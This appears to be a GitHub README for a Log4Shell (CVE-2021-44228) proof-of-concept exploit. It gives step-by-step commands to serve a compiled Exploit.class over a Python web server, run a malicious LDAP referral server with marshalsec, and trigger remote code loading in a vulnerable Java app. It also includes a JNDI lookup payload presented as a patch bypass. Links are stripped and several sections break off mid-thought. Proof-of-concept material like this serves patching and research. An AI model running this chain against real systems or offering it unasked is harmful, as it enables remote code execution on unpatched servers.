# CVE-2021-44228 (Apache Log4j Remote Code Execution)

> [all log4j-core versions >=2.0-beta9 and <=2.14.1](

The version of 1.x has other vulnerabilities, it is recommended to update to the latest version.

[Security Advisories / Bulletins linked to Log4Shell (CVE-2021-44228)](

### Usage:

Download this project, compile the exploit code [blob/master/src/main/java/](, and start a webserver to allow downloading the compiled binary.

git clone
cd CVE-2021-44228


# start webserver
# For Python2
python -m SimpleHTTPServer 8888
# For Python3
python3 -m http.server 8888

# make sure the python webserver is running in the same directory as Exploit.class, to test
  curl -I

Download another project and run *LDAP server implementation returning JNDI references**
git clone
cd marshalsec
# Java 8 required
mvn clean package -DskipTests
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer ""

Build and run the activation code (simulate an log4j attack on a vulnerable java web server) [blob/master/src/main/java/](, and your calculator app will appear.
cd CVE-2021-44228
mvn clean package
java -cp target/log4j-rce-1.0-SNAPSHOT-all.jar log4j

# Expect the following
# 1. calculator app appears
# 2. in ldapserver console,
#  Send LDAP reference result for Exploit redirecting to
# 3. in webserver console,
# - - [....] "GET /Exploit.class HTTP/1.1" 200 -


> Do not rely on a current Java version to save you. Update Log4 (or remove the JNDI lookup). Disable the expansion (seems a pretty bad idea anyways).

### Bypass rc1
For example:
${jndi:ldap:// badClassName}

### Bypass WAF
> Don't trust the web application firewall.

### Details Of Vuln
Lookups provide a way to add values to the Log4j configuration at arbitrary places.


> The methods to cause leak in finally